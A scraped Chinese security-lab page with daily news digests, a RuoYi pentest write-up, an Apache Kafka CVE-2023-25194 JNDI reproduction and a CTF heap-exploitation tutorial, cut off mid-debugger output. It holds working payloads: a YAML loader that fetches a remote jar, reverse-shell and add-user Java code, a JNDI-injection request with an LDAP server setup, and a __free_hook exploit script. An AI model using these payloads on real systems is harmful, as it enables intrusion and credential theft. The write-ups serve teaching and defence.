网络安全日报 2023年03月27日
1、GitHub SSH私钥意外在公共库中短暂暴露 https://www.bleepingcomputer.com/news/security/githubcom-rotates-its-exposed-private-ssh-key/ GitHub 私钥意外在一个公共的代码库中暴露。GitHub 表示尽管私钥暴露的时间很短,但谨慎起见还是决定更换密钥。GitHub 发布了一份博客帖子,详细介绍了所采取的措施以及新的公钥指纹。GitHub 表示不会因此泄露任何客户信息,并呼吁用户更新 ~/.ssh/known_hosts 文件以避免中间人攻击。此外,虽然 GitHub 更换了私钥,但一些软件项目和文档仍在使用已撤销的 SSH 指纹。 2、WordPress的WooCommerce Payments插件存在严重漏洞 https://thehackernews.com/2023/03/critical-woocommerce-payments-plugin.html WordPress的WooCommerce Payments插件存在一个严重安全漏洞,可能允许攻击者未经授权访问受影响的商店并完全接管网站。该漏洞影响版本为4.8.0至5.6.1。WordPress已发布补丁并自动更新使用受影响软件版本的网站。目前尚未发现该漏洞被积极利用的证据,但用户需要更新到最新版本并检查是否有新添加的管理员用户,并更改所有管理员密码和API密钥。 3、CISA发布检测微软云环境中恶意活动的免费工具 https://www.helpnetsecurity.com/2023/03/24/malicious-activity-microsoft-cloud/ 在 Microsoft Azure、Azure Active Directory (AAD) 和 Microsoft 365 (M365) 云环境中搜索恶意活动的网络防御者可以使用新的开源解决方案:Untitled Goose Tool。它由美国网络安全和基础设施安全局 (CISA) 发布,允许用户导出和查看日志、警报、配置等。 4、OpenAI称ChatGPT对话记录混乱是由Redis错误引发 https://thehackernews.com/2023/03/openai-reveals-redis-bug-behind-chatgpt.html 本周早些时候,OpenAI的ChatGPT服务暴露了部分用户的个人信息和对话记录,该公司在周五透露,这是由于Redis开源库中的一个错误所导致的,该错误源于redis-py库,可能导致连接损坏并从数据库缓存返回意外数据,进而使一些用户从聊天记录侧边栏查看了其他用户对话的摘要。 5、英国国家打击犯罪局伪装DDoS服务商渗透网络犯罪市场 https://www.hackread.com/nca-cybercrime-market-fake-ddos-sites/ 国家打击犯罪局 (NCA) 开展了一项诱捕行动,利用虚假的 DDoS 站点渗透网络犯罪市场,以实施犯罪打击行动。NCA 将所有这些网站设计得看起来很真实,给访问者一种所提供的工具和服务可以让他们发起 DDoS 攻击的印象。 6、 研究人员实现通过超声波控制智能设备 https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/ 美国大学研究人员开发了一种名为NUIT的新型攻击,可以对使用语音助手的设备进行静默攻击。NUIT攻击的主要原理是智能设备的麦克风可以响应人耳无法听到的超声波,因此攻击可以在使用传统扬声器技术的同时最大程度地减少暴露风险。 7、宝洁公司因GoAnywhere零日漏洞泄露数据 https://www.bleepingcomputer.com/news/security/procter-and-gamble-confirms-data-theft-via-goanywhere-zero-day/ 宝洁(Procter & Gamble)公司确认遭遇数据泄露,幸未影响客户数据。P&G表示,攻击者未获得员工的财务或社会保障信息,但确实窃取了一些数据。P&G公司停用了Fortra的GoAnywhere安全文件共享服务。 8、Microsoft发布Windows截图工具安全更新 https://www.bleepingcomputer.com/news/microsoft/microsoft-pushes-oob-security-updates-for-windows-snipping-tool-flaw/ 微软为Windows 10、11的截图工具发布了紧急安全更新,以修复Acropalypse隐私漏洞。该漏洞会导致剪裁后的数据留在原始文件中,从而有可能导致敏感信息泄露。微软发布了CVE-2023-28303漏洞的安全更新,建议用户立即安装。 9、Vice Society声称攻击了波多黎各水务机构 https://securityaffairs.com/144022/hacking/puerto-rico-aqueduct-and-sewer-authority-attack.html 波多黎各沟渠与污水管理局(PRASA)遭受网络攻击,现正与美国FBI和CISA进行调查。攻击者获取到客户和员工信息,但该局重要基础设施的运营未受影响。攻击者身份暂时未知,但Vice Society勒索软件组将该机构添加到其受害者名单中,并泄露了个人护照、驾照和其他文件。 10、攻击者利用USB触发物理炸弹攻击新闻机构 https://www.malwarebytes.com/blog/news/2023/03/5-news-stations-receive-explosive-usb-stick-letter-bombs 近日,厄瓜多尔的五家不同新闻机构收到一些包裹,包含一个USB盘。其中一名记者在将其插入电脑后,该设备就爆炸了,导致新闻室人员受伤,至少其中一个装置装有“军用炸药”。通常黑客通过发送感染了恶意软件的USB盘给受害者来进行攻击,而这次更加体现了USB安全管理的重要性。目前,执法部门正在调查此事件。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
记一次若依后台管理系统渗透
前言 最近客户开始hw前的风险排查,让我们帮他做个渗透测试,只给一个单位名称。通过前期的信息收集,发现了这个站点: 没有验证码,再加上这个图标,吸引了我注意: 从弱口令开始 若依默认口令为admin/admin123,结果真的直接进了。 管理员权限,直接上工具探测一下是否有若依的几个漏洞: 工具链接:https://github.com/thelostworldFree/Ruoyi-All 还得是运气啊!原本想着直接用这个工具一键穿的,但是奈何没利用过若依的洞,这个工具也不会使用。后续去查看了几篇文章,需要上传jar包,该漏洞可通过定时任务去调用执行jar包。 文章地址:https://blog.csdn.net/FY10033/article/details/126206890 然后坑来了。按照教程去实践,发现怎么样也无法执行漏洞。以下是java代码:  public AwesomeScriptEngineFactory() {\   try {\     Runtime.getRuntime().exec(\"net user test test@123 /add\");\     Runtime.getRuntime().exec(\"ping tttt.ogjxcqvtbf.dnstunnel.run\");\     Runtime.getRuntime().exec(\"ping  %USERNAME%.ogjxcqvtbf.dnstunnel.run\");\   }catch (IOException e) {\      e.printStackTrace();\    }\  } 还得从shiro入手 尝试了一下午后,想想算了,看看有没有别的洞吧。刚好文章里面有写到,ruoyi的shiro存在默认密钥,结果一尝试,还真的存在。(Ps:这边有个坑,我用文章里面提到的LiqunKit去尝试,无法执行命令。后续用了shiro_attack成功命令执行) 然后通过shiro写入内存马: 对内存马感兴趣的,可以看下这两篇文章: http://www.manongjc.com/detail/64-jmklbsfdbhdslrw.htmlhttps://blog.csdn.net/MachineGunJoe/article/details/118088350但是可惜,这是一台云主机,整个内网就一台主机。很多人可能看到esc,就不想再打了。不过我还是去翻了一下文件夹,把数据库账号也拉下来。 这个项目很奇怪,我找到的项目路径下全是jar包,我都怀疑这个是不是web目录。在基础信息里面找到了路径: catalina.home =C:\Users\Administrator\AppData\Local\Temp\2\tomcat.937421519914311975.808 但是进入该路径下,发现没文件,不知道是不是权限不够。 可以看到这边只限制127.0.0.1的ip访问,这就很尴尬,所以这边我使用ligolo代理3306出来,成功进行连接: 工具链接:https://github.com/FunnyWolf/ligolo 其实也尝试过添加用户,但是貌似被拦截了。原本想用哥斯拉的内存马进行一键提权的,但是不知道为什么,哥斯拉的内存马一直连接不上。有大佬懂的,还望不吝赐教。 再战定时任务 但是对于定时任务没复现出来,我还是很执着,通过查看其它大佬写的文章,发现了原来这个jar包的代码有问题,windows和linux的命令执行不一样,windows没办法直接通过exec执行,需要调用cmd进程进行执行。后续参考了这篇文章: https://www.cnblogs.com/BOHB-yunying/p/15661384.html配置完后,后台添加定时任务 org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vpsip:8000/yaml-payload.jar"]]]]') Java部分源码: +-----------------------------------------------------------------------+| String host="ip"; || ||         int port = 6767; || ||         String cmd="cmd.exe"; || ||         Process p=new || ProcessBuilder(cmd).redirectErrorStream(true).start(); || ||         java.net.Socket s=new java.net.Socket(ho 然后通过以下命令编译并打包为jar包: +-----------------------------------------------------------------------+| javac src/artsploit/AwesomeScriptEngineFactory.java //编译java文件 || || jar -cvf yaml-payload.jar -C src/ . //打包jar包 |+=======================================================================++------------------------------------ 成功反弹shell到我vps上: 总结与思考 其实如果整片文章看下来,可能会觉得比较顺利,但是其实踩了很多坑,以下是我自己的总结,也和大家分享一下: 冰蝎多版本不支持shiro_attack生成的内存马,目前发现3.0Beta9版本修复版支持; 若依的定时任务java代码执行:Linux和windows的执行代码是不同的,windows需要调用cmd进程去执行,才导致一直测试不成功; 冰蝎自带的socks代理和数据库工具很难用,经常出现奇奇怪怪的问题。可以使用第三方工具。如ligolo,把数据库端口映射出来,再去访问登录。我就是用自带的数据库管理工具连不上,然后socks代理也连不上,才使用第三方工具的; netuser添加用户失败大概率是权限不足或者杀软拦截了。上线后可以先tasklist查看是否有杀软。其实就是和渗透前的信息收集一样,上线后也要收集一下当前服务器的信息; 遇到渗透的效果和自己预想的不一样的情况,要学会排查,猜测问题的原因。如我本次代理3306端口出来,一直去尝试账号密码登录,但是一直登录不上。排查了一圈,才发现当时为了安全起见,把我的代理端口限制IP访问了。
网络安全日报 2023年03月24日
1、思科修复了其 IOS 和 IOS XE 软件中的多个严重漏洞 https://securityaffairs.com/143922/security/cisco-vulnerabilities-ios-software.html 思科解决了其 IOS 和 IOS XE 软件中的数十个漏洞,其中六个问题被评为“高严重性”。 2、谷歌:训练聊天机器人Bard数据集不包含Gmail数据 https://www.anquanke.com/post/id/287729 谷歌澄清:训练聊天机器人 Bard 的数据集并不包含 Gmail 数据 3、都乐披露 2 月份遭勒索软件攻击后的数据泄露 https://securityaffairs.com/143902/data-breach/dole-food-company-data-breach.html 都乐食品公司证实,最近勒索软件攻击的网络犯罪团伙访问了员工数据。 4、一种新兴的 Android 银行木马"Nexus",针对 450 个金融应用程序 https://www.securityweek.com/nexus-android-trojan-targets-450-financial-applications/ 据防欺诈公司 Cleafy 称,Nexus Android 银行木马正在地下论坛上作为一种新的僵尸网络进行推广,采用恶意软件即服务 (MaaS) 商业模式。 5、虚假 ChatGPT Chrome 浏览器扩展劫持 Facebook 帐户 https://thehackernews.com/2023/03/fake-chatgpt-chrome-browser-extension.html Guardio安全团队发现了一种新的恶意Chat-GPT Chrome扩展程序,已被数千人下载。最近一次攻击中使用的版本基于一个合法的开源项目,威胁行为者添加了恶意代码以窃取Facebook账户。该合法扩展名为“ChatGPT for Google”,允许在搜索结果中集成ChatGPT结果。 6、德韩两国政府警告Kimsuky网络攻击活动加剧 https://thehackernews.com/2023/03/german-and-south-korean-agencies-warn.html 德国和韩国政府机构发出警告,朝鲜侦察总局下属部门Kimsuky的网络攻击活动正在加剧,最新攻击手段包括使用虚假浏览器扩展窃取用户Gmail收件箱。Kimsuky被认为是一组专门从学术、制造业和国家安全行业收集数据的威胁行为者。 7、BlackGuard窃密木马新变种扩展了其功能 https://cybersecurity.att.com/blogs/labs-research/blackguard-stealer-extends-its-capabilities-in-new-variant AT&T Alien Labs的研究人员发现BlackGuard stealer的新变种通过钓鱼攻击传播。该恶意软件在之前的版本基础上进行了进化,现在具备了新的功能。新的变种试图通过可移动介质和共享设备进行传播。 8、Lionsgate视频网站用户数据约三千万条记录遭泄露 https://securityaffairs.com/143886/security/lionsgate-data-leak.html 研究人员发现,Lionsgate Play流媒体平台泄露了约三千万条记录,其中包括订阅者的IP地址、设备信息、操作系统和Web浏览器,以及平台使用数据。研究人员还发现了未知用途的哈希值。Cybernews已联系Lionsgate求证泄露事件,但该公司尚未提供正式回应。 9、英特尔宣布了最新版本的 vPro 平台,增强芯片安全功能减少攻击面 英特尔周四宣布了最新版本的 vPro 平台,适用于最近推出的第 13 代酷睿处理器,声称它显着提高了安全性。 https://www.securityweek.com/intel-boasts-attack-surface-reduction-with-new-13th-gen-core-vpro-platform/ 10、Pwn2Own Vancouver 2023 第一天:Windows 11 和特斯拉被攻破 https://securityaffairs.com/143892/hacking/pwn2own-vancouver-2023-day-1.html 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析
关于 Apache Kafka是一个开源的分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和任务关键型应用程序。 影响版本 2.4.0<=Apache kafka<=3.2.2 环境搭建 满足影响版本的应该都可以,这里我是使用的版本为2.5.0 wget https://archive.apache.org/dist/kafka/2.5.0/kafka_2.13-2.5.0.tgz 直接解压 这里可以使用命令直接起起来,最新版的kafka是集成Zookeeper .\bin\windows\zookeeper-server-start.bat .\config\zookeeper.properties 但是报错了,可以自己安装zookeeper 下载地址 http://zookeeper.apache.org/releases.html这里配置文件其实可以补钙,实际上日志记录功能可选择不要,直接启动 服务端正常启动。 只要不报错即为正常启动 继续修改kafka配置文件server.properties文件,修改日志存放路径 命令启动 .\bin\windows\kafka-server-start.bat .\config\server.properties 测试kafa搭建是否存在问题 创建主题 .\bin\windows\kafka-topics.bat --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic test111 查询主题 .\bin\windows\kafka-topics.bat --list --bootstrap-server localhost:9092 创建生产者 .\bin\windows\kafka-console-producer.bat --broker-list localhost:9092 --topic test111 创建消费者 .\bin\windows\kafka-console-consumer.bat --bootstrap-server localhost:9092 --topic test111 --from-beginning 消息收发没有问题,生产者输入信息之后消费者会自动消费。 启动connect .\bin\windows\connect-standalone.bat .\config\connect-standalone.properties .\config\connect-file-source.properties .\config\connect-file-sink.properties 因为牵涉到补图片,图片内的时间顺序可能不对,请忽略 访问 http://192.168.2.135:8083/connector-plugins这里是没有插件的,所以需要安装插件。这里要复现CVE-2023-25194,需要使用io.debezium.connector.mysql.MySqlConnector类,所以需要配置Debezium MySQL 连接器配置属性 安装Debezium https://debezium.io/releases/2.1/这里根据自己环境安装,比较友好的时不同的版本有介绍需要的java版本,因为我的java环境为1.8+的,所以这里我选择的版本比较老 在kafka的安装目录创建一个文件夹 存放debezium,修改kafka的配置文件 插件注意指向debezium的存放路径,重新启动,获取到插件,这里需要必坑的位置 1.java版本需要匹配kafka版本以及其他组件版本 2.配置文件需要修改,否则会报错。 kafka在连接Mysql时 数据需要同步到 Elasticsearch 具体的文章可以参考 https://my.oschina.net/u/4923278/blog/5007756安装mysql https://dev.mysql.com/downloads/installer/需要避坑的位置 结束 登录mysql数据库,设置允许外部连接 GRANT ALL ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; GRANT ALL ON *.* TO ''@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; set time_zone='+8:00'; show variables like '%time_zone%'; mysql需要开启配置 log_bin           = mysql-bin binlog_format     = ROW binlog_row_image  = FULL expire_logs_days  = 10 可参考 https://blog.csdn.net/wang972779876/article/details/120002546访问路径 http://192.168.2.135:8083/connector-plugins发现插件正常启动,参考的有复现的文章,说的时需要做时钟同步,但是在测试的时候发现其实时钟未做设置的时候也没有问题。 漏洞利用 POC如下: POST /connectors HTTP/1.1 Host: 192.168.2.135:8083 Content-Type: application/json Content-Length: 809 { "name": "mysql-connect", "config": { "connector.class": "io.debezium.connector.mysql.MySqlConnector", "database.hostname": "192.168.2.135", "database.port": "3306", "database.user": "root", "database.password": "root", "database.server.id": "316545017", "database.server.name": "test1", "database.history.kafka.bootstrap.servers": "192.168.2.135:9092", "database.history.kafka.topic": "quickstart-events",   "database.history.producer.security.protocol": "SASL_SSL",   "database.history.producer.sasl.mechanism": "PLAIN",   "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.2.149:1389/rce\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" } } 具体的参数的配置属性可以参考这篇文章 https://blog.csdn.net/weixin_43564627/article/details/118959829在利用的时候需要注意在使用name时,为连接器的名称,重复注册则会返回报错。 使用marshalsec-0.0.3-SNAPSHOT-all.jar起ldap服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.2.135:8888/#Calc 1389 发送POC 可以看到请求了恶意类 恶意类内容calc.java import java.lang.Runtime; public class Calc {    public Calc() throws Exception{        Runtime.getRuntime().exec("C:\Windwos\System32\cmd.exe ipconfg>C:\Users\Administrator\Desktop\2.txt");   } } 编译java javac calc.java 在8888端口起http服务 python -m http.server 8888 执行payload 漏洞原理 Apache Kafka Connect 是 Kafka 中用于和其他数据系统传输数据的服务,其独立运行版本可以在 Kafka 发布包中通过 bin/connect-standalone.sh 启动,默认会在 8083 端口开启 HTTP REST API 服务,可对连接器(Connector)的配置进行操作。 将连接器中的 Kafka 客户端 sasl.jaas.config 属性值设置为 com.sun.security.auth.module.JndiLoginModule(通过 producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config 或 admin.override.sasl.jaas.config 属性进行配置)时,如果连接器连接到攻击者可控的 LDAP 服务器时容易受到反序列化攻击。
网络安全日报 2023年03月23日
1、Magecart利用Javascript混淆器窃取攻击支付网站 https://www.malwarebytes.com/blog/threat-intelligence/2023/03/hunter-skimmer 攻击者经常试图以各种方式隐藏其代码,从二进制打包程序到混淆器。在客户端攻击中,信用卡窃取器中的混淆器很常见,因为它们可以使代码识别更加困难。我们发现,Magecart窃取者使用Hunter,一种PHP编写的Javascript混淆器。 2、Google Pixel中的漏洞允许还原被编辑的原始屏幕截图 https://www.securityweek.com/google-pixel-vulnerability-allows-the-recovery-of-cropped-screenshots/ Google Pixel设备上的图像编辑应用Markup存在漏洞,未能正确截断编辑过的图像,使得裁剪后原始的数据可恢复。这个漏洞被称为“Cropalypse”(裁剪末日),是由于Markup在代码更改后没有遵守规范所致,而这个漏洞自2018年以来就一直存在。 3、研究人员披露SideCopy APT组织针对南亚的攻击活动 https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/ SideCopy APT自2019年以来一直活跃,主要针对印度和阿富汗等南亚国家。该组织因模仿SideWinder APT的感染链而命名。最近,该组织攻击了印度国防研究与发展组织,该组织负责研发导弹、雷达、电子战和通信系统、海军和航空航天系统等国防系统。 4、知名黑客论坛BreachForums宣布关闭 https://www.freebuf.com/news/361257.html 当地时间3月21日,知名地下黑客论坛BreachForums的现任管理员Baphomet发布了称之为”最终版“的论坛更新,并宣称该论坛将正式关闭。 5、Win10 / Win11 存在与Pixel 类似漏洞:可部分还原已修剪图片 https://www.ithome.com/0/681/412.htm 微软 Win11 系统原生的 Windows Snipping Tool、Win10 系统中原生的“Snip & Sketch”截图同样存在 aCropalypse 漏洞,通过将图像格式从 RGB 修改为 RGBA,同样可以还原修剪操作之后的原图信息。 6、BBC 建议员工从工作手机上卸载 TikTok https://news.slashdot.org/story/23/03/21/0420223/bbc-advises-staff-to-delete-tiktok-from-work-phones BBC 以隐私和安全理由建议员工从工作手机上卸载 TikTok。BBC 成为丹麦公共服务广播公司之后世界第二家、英国第一家限制 TikTok 使用的媒体机构。BBC 表示它会继续将该平台用于编辑和市场推广目的。 7、拥有 3700 万订阅用户的流媒体平台Lionsgate泄露了用户数据 https://securityaffairs.com/143886/security/lionsgate-data-leak.html Cybernews 研究团队发现了一个未受保护的 20GB 服务器日志,其中包含近 3000 万条条目,最早的日期是 2022 年 5 月。日志暴露了订阅者的 IP 地址以及有关设备、操作系统和 Web 浏览器的用户数据。 8、谷歌发布 Chrome 111 更新,修复多个高危漏洞 https://www.securityweek.com/chrome-111-update-patches-high-severity-vulnerabilities/ 谷歌本周宣布了 Chrome 111 更新,为八个漏洞带来了补丁,其中七个高严重性内存安全漏洞。 9、研究人员发布了针对 Netgear Orbi 路由器严重漏洞PoC https://securityaffairs.com/143863/hacking/netgear-orbi-routers-flaws.html Cisco Talos 研究人员针对 Netgear Orbi 750 系列路由器和WIFI扩展设备中的漏洞发布了 PoC 。 10、CatB 勒索软件利用 MSDTC 服务窃取数据 https://cyware.com/news/catb-ransomware-exploits-msdtc-service-to-steal-data-3bb46fc0 据 SentinelOne 的研究人员称,该团伙最近转向通过 Microsoft 分布式事务处理协调器 (MSDTC) 进行 DLL 劫持,以窃取数据和启动勒索软件有效负载。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年03月22日
1、黑客利用恶意NuGet包攻击.NET开发人员 https://www.bleepingcomputer.com/news/security/hackers-target-net-developers-with-malicious-nuget-packages/ 攻击者利用 NuGet 存储库中的虚假软件包,针对 .NET 开发人员进行攻击以传播加密货币窃取程序。其中三个软件包在一个月内被下载超过 15 万次。攻击者还模仿了看起来像是在 NuGet .NET 包管理器上工作的 Microsoft 软件开发人员的账户。 2、报告显示我国网络安全产业处于繁荣发展时期 http://www.anquan419.com/knews/24/4660.html 日前举办的2023年中国网络和数据安全产业高峰论坛“网络安全技术创新赋能产业发展”分论坛上,中国信息通信研究院安全研究所发布《中国网络安全市场洞察报告(2022年)》。报告显示,我国网络安全产业处于繁荣发展时期,产业增速明显高于全球水平,产业发展潜力巨大。 3、General Bytes比特币ATM机因零日漏洞被窃取了160万美元的加密货币 https://thehackernews.com/2023/03/hackers-steal-over-16-million-in-crypto.html General Bytes 比特币 ATM 被黑客攻击,利用零日漏洞窃取了超过 160 万美元的加密货币(包括 56.283 BTC,价值约150万美元,21.823 ETH,价值约 36500 美元,以及 1219.183 LTC,价值约 96500 美元)。攻击者上传了恶意 Java 应用程序,利用 "batm" 用户权限执行攻击。这是 General Bytes 第二次被零日漏洞攻击。 4、法拉利被黑客入侵,大量富豪个人信息泄露 https://www.freebuf.com/news/361129.html 本周一,意大利豪华汽车制造商法拉利公司在其网站上发布了一条消息,该消息表示近日遭到了不明来源的黑客攻击。此次黑客攻击事件导致部分客户的个人信息遭到泄露,目前黑客威胁法拉利公司支付赎金,否则将公布客户的信息,包含联系方式、邮箱等。总部位于意大利马拉内罗的汽车制造商似乎在黑客联系他们之前并不知道他们已被入侵。 5、GPT-4 为通过人机验证,试图雇人给自己打工,还骗了对方 https://www.secrss.com/articles/52877 OpenAI 自己的报告中已有详细说明,这份长达 60 页的报告中,该机构概述了 GPT-4 的各类实验结果和面临的挑战,其中描述的一个案例介绍了 GPT-4 是如何欺骗人类以诱使他们通过验证码(CAPTCHA)测试的。 6、暗网数据泄密网站 BreachForums 站长被捕 https://www.solidot.org/story?sid=74429 美国 FBI 逮捕了一名纽约男子,他被控运营了暗网网络犯罪论坛 BreachForums,该论坛是世界最大的出售被盗数据的网站之一。 7、新的 ShellBot DDoS 机器人恶意软件针对Linux SSH服务 https://securityaffairs.com/143807/cyber-crime/shellbot-targets-linux-ssh-servers.html AhnLab 安全紧急响应中心 (ASEC) 发现了ShellBot恶意软件的一个新变体,该变体被用于针对管理不善的 Linux SSH 服务器的攻击活动。 8、Adobe Acrobat Sign 被滥用以分发恶意软件 网络安全公司 Avast 警告称,已观察到网络犯罪分子滥用 Adobe 的 Acrobat Sign 服务来分发包含 RedLine 窃取程序的恶意电子邮件。 9、Aveva HMI、SCADA 产品中存在可远程利用的漏洞 https://www.securityweek.com/organizations-notified-of-remotely-exploitable-vulnerabilities-in-aveva-hmi-scada-products/ 使用英国工业软件制造商 Aveva 的人机界面 (HMI) 和监控与数据采集 (SCADA) 产品的组织已被告知存在几个潜在的严重漏洞。 10、新的 "HinataBot "僵尸网络可以发动大规模的 DDoS 攻击 https://www.freebuf.com/news/361013.html 一个新的恶意僵尸网络被发现,它以 Realtek SDK、华为路由器和 Hadoop YARN 服务器为目标,将设备引入到 DDoS(分布式拒绝服务)群中,有可能进行大规模攻击。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
关于“堆”题的总体思路
浅说一下pwn堆,并用一个简单的例子具体说明,给刚入坑堆的小朋友说的一些思路。 堆是什么 堆,你可以看成一个结构体数组,然后数组里每个元素都会开辟一块内存来存储数据,那么这块用来存储数据的内存就是堆。 结构体数组在BSS段上,其内容就是堆的地址,也就是堆的指针。 堆的理解 堆有很多题型 什么堆溢出,off by null , uaf 等。 核心的话主要是学思想,所有人都知道我要得到shell,cat flag。但是要怎么去干得有个过程, 比如我们做栈题,很容易知道我要劫持栈的返回去执行任意地址,填入shellcode什么的。 堆的话也是一样。 就是用system去执行/bin/sh。越复杂的问题往往只需要很简单的道理。 所以堆到底要怎么去执行。 我们可以把某一个函数的内容改成system,下次调用该函数即是使用system, 再在别的堆里面放入/bin/sh字符串,然后再用刚刚修改的函数,使用已经放入字符串的堆。 即可执行system(/bin/sh)了 一般修改__free_hook,使其内容变成system然后再free掉放有/bin/sh的堆 举例说明 我用一个很简单的例子去一步一步简单剖析。 这里我用一个很简单的例子去一步一步简单剖析。 先给出源码和gcc编译,使用的是Ubuntu18 gcc -o lizi lizi.c#include<stdio.h> #include<stdlib.h> char *heap[0x20]; int num=0; void create() { if(num>=0x20) { puts("no more"); return; } int size; puts("how big"); scanf("%d",&size); heap[num]=(char *)malloc(size); num++; } void show(){  int idx;  char buf[4];  puts("idx");   (read(0, buf, 4));    idx = atoi(buf);  if (!heap[idx]) {    puts("no have things\n"); } else {    printf("Content:");    printf("%s",heap[idx]); } } void dele() {  int idx;  char buf[4];  puts("idx");   (read(0, buf, 4));    idx = atoi(buf);  if (!heap[idx]) {    puts("no have things\n"); } else { free(heap[idx]); heap[idx]=NULL; num--; } } void edit() {  int size;  int idx;  char buf[4];  puts("idx");   (read(0, buf, 4));    idx = atoi(buf);  if (!heap[idx]) {    puts("no have things\n"); } else { puts("how big u read"); scanf("%d",&size); puts("Content:"); read(0,heap[idx],size); } } void menu(void){ puts("1.create"); puts("2.dele"); puts("3.edit"); puts("4.show"); } void main() { int choice; while(1) { menu(); scanf("%d",&choice); switch(choice) { case 1:create();break; case 2:dele();break; case 3:edit();break; case 4:show();break; default:puts("error"); } } } 我们也不用ida了,直接源码分析,很明显在edit处能知道我们可以修改堆大小, 而导致的堆溢出修改下一个堆。 我们可以直接使用unsortedbin,申请较大的堆,再free掉,再申请个小堆, 使其从unsortedbin里面切割堆,这样,你申请的小堆就会有一些unsortedbin里面的东西。 (具体请看unsortedbin介绍) 结合exp介绍: from pwn import * r=process('./lizi') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') context.log_level='debug' def add(size): r.sendlineafter("4.show\n",'1') r.sendlineafter("idx\n",str(size)) def dele(idx): r.sendlineafter("4.show\n",'2') r.sendlineafter("idx\n",str(idx)) def edit(idx,size,con): r.sendlineafter("4.show\n",'3') r.sendlineafter("idx\n",str(idx)) r.sendlineafter("how big u read\n",str(size)) r.sendafter("Content:\n",con) def show(idx): r.sendlineafter("4.show\n",'4') r.sendlineafter("idx\n",str(idx)) add(0x420) add(0x420) add(0x420) dele(1) add(0x70) show(2) r.recvuntil("Content:") base=u64(r.recv(6)+'\x00'*2)-0x3ec090 print(hex(base)) free=base+libc.sym['__free_hook'] sys=base+libc.sym['system'] add(0x70) dele(3) edit(2,0x100,'a'*0x70+p64(0xa0)+p64(0xa1)+p64(free)) add(0x70) add(0x70) edit(3,0x10,"/bin/sh\x00") edit(4,0x10,p64(sys)) dele(3) r.interactive() 首先菜单不用多说,很简单的交互,写好就行 然后申请3个堆,为了保证能进入unsortedbin,得大于tcache的大小,然后free掉1号堆 unsortedbin all: 0x55ce36aa7aa0 —▸ 0x7f4f9036aca0 (main_arena+96) ◂— 0x55ce36aa7aa0 可以看到1号堆已经进入到unsortedbin了 然后申请一个小堆 pwndbg> x/32gx 0x55697b2cfaa0 0x55697b2cfaa0: 0x0000000000000000 0x0000000000000081 0x55697b2cfab0: 0x00007fb8eada6090 0x00007fb8eada6090 0x55697b2cfac0: 0x000055697b2cfaa0 0x000055697b2cfaa0 0x55697b2cfad0: 0x0000000000000000 0x0000000000000000 0x55697b2cfae0: 0x0000000000000000 0x0000000000000000 0x55697b2cfaf0: 0x0000000000000000 0x0000000000000000 0x55697b2cfb00: 0x0000000000000000 0x0000000000000000 0x55697b2cfb10: 0x0000000000000000 0x0000000000000000 0x55697b2cfb20: 0x0000000000000000 0x00000000000003b1 0x55697b2cfb30: 0x00007fb8eada5ca0 0x00007fb8eada5ca0 0x55697b2cfb40: 0x0000000000000000 0x0000000000000000 0x55697b2cfb50: 0x0000000000000000 0x0000000000000000 0x55697b2cfb60: 0x0000000000000000 0x0000000000000000 0x55697b2cfb70: 0x0000000000000000 0x0000000000000000 0x55697b2cfb80: 0x0000000000000000 0x0000000000000000 0x55697b2cfb90: 0x0000000000000000 0x0000000000000000 查看申请堆的地址可以发现,11行处是已经之前free掉的1号堆,这个申请的堆会在unsortedbin里面切割 然后会有残留地址,然后我们把他show出来就可以计算一波libc地址了。 算出system,__free_hook的libc, 接着为什么要多申请一个堆,这里就是堆溢出的打法了, 在刚刚申请的堆后面再建一个堆,然后通过free掉修改内容指向__free_hook地址 再把内容改成system就可以把free当做system用了; 在edit(2,0x100,'a'*0x70+p64(0xa0)+p64(0xa1)+p64(free))后面打个断点 GDB看看 pwndbg> bin tcachebins 0x80 [ 1]: 0x55f37c653b30 —▸ 0x7f4497d688e8 (__free_hook) ◂— ... fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x55f37c653ba0 —▸ 0x7f4497d66ca0 (main_arena+96) ◂— 0x55f37c653ba0 smallbins empty largebins empty 会发现tcache里面已经有__free_hook了,因为已经把内容改成__free_hook的地址了。 然后申请2个堆,把tcache里面的__free_hook拿出来。 你也可以验证一下、 pwndbg> vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA   0x55f37bb59000     0x55f37bb5a000 r-xp     1000 0 pwndbg> x/32gx 